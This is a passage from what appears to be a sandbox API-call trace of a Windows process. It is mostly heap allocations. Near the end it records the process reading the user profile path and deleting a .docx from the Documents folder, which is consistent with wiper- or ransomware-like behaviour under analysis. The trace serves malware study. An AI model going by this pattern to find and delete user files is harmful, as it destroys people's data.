(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.104] CloseHandle (hObject=0x268) returned 1 [0262.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0262.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0262.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0262.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0262.110] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0262.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0262.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0262.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0262.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0262.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0262.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0262.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0262.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0262.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0262.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0262.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0262.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0262.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0262.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0262.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0262.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0262.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0262.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0262.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0262.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0262.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0262.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0262.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0262.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0262.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0262.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0262.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0262.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0262.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0262.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0262.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0262.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0262.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0262.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0262.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0262.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0262.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0262.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0262.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0262.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0262.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0262.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0262.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0262.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0262.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0262.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0262.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0262.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0262.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0262.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0262.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0262.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0262.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0262.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0262.117] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0262.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0262.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0262.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0262.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0262.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0262.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0262.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0262.118] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0262.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0262.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0262.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0262.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0262.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0262.118] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0262.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0262.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0262.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0262.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0262.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0262.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0262.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0262.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0262.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0262.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0262.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0262.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0262.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0262.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0262.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24f5278 [0262.120] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/dKfh5A-JQm_Dx.docx", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dKfh5A-JQm_Dx.docx", lpFilePart=0x8bedfc*="dKfh5A-JQm_Dx.docx") returned 0x3a [0262.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0262.120] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dKfh5A-JQm_Dx.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dkfh5a-jqm_dx.docx")) returned 0x20 [0262.120] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dKfh5A-JQm_Dx.docx", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77884b40, ftCreationTime.dwHighDateTime=0x1d4f5df, ftLastAccessTime.dwLowDateTime=0xd4658920, ftLastAccessTime.dwHighDateTime=0x1d47e04, ftLastWriteTime.dwLowDateTime=0xd4658920, ftLastWriteTime.dwHighDateTime=0x1d47e04, nFileSizeHigh=0x0, nFileSizeLow=0x18bb1, dwReserved0=0x1b19, dwReserved1=0x4, cFileName="dKfh5A-JQm_Dx.docx", cAlternateFileName="DKFH5A~1.DOC")) returned 0xaa59a0 [0262.121] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dKfh5A-JQm_Dx.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dkfh5a-jqm_dx.docx")) returned 1 [0262.124] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77884b40, ftCreationTime.dwHighDateTime=0x1d4f5df, ftLastAccessTime.dwLowDateTime=0xd4658920, ftLastAccessTime.dwHighDateTime=0x1d47e04, ftLastWriteTime.dwLowDateTime=0xd4658920, ftLastWriteTime.dwHighDateTime=0x1d47e04, nFileSizeHigh=0x0, nFileSizeLow=0x18bb1, dwReserved0=0x1b19, dwReserved1=0x4, cFileName="dKfh5A-JQm_Dx.docx", cAlternateFileName="DKFH5A~1.DOC")) returned 0 [0262.124] FindClose (in: hFindFile=0xaa59a0 | out: hFindFile=0xaa59a0) returned 1 [0262.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0262.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0262.124] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0262.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0262.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0262.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0262.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0262.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0262.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0262.125] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0262.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0262.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0262.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0262.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0262.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0262.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c90 [0262.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0262.125] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0262.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0262.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0262.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0262.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0262.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0262.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0262.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0262.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0262.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0262.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0262.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0262.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0262.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.127] HeapFree (in: 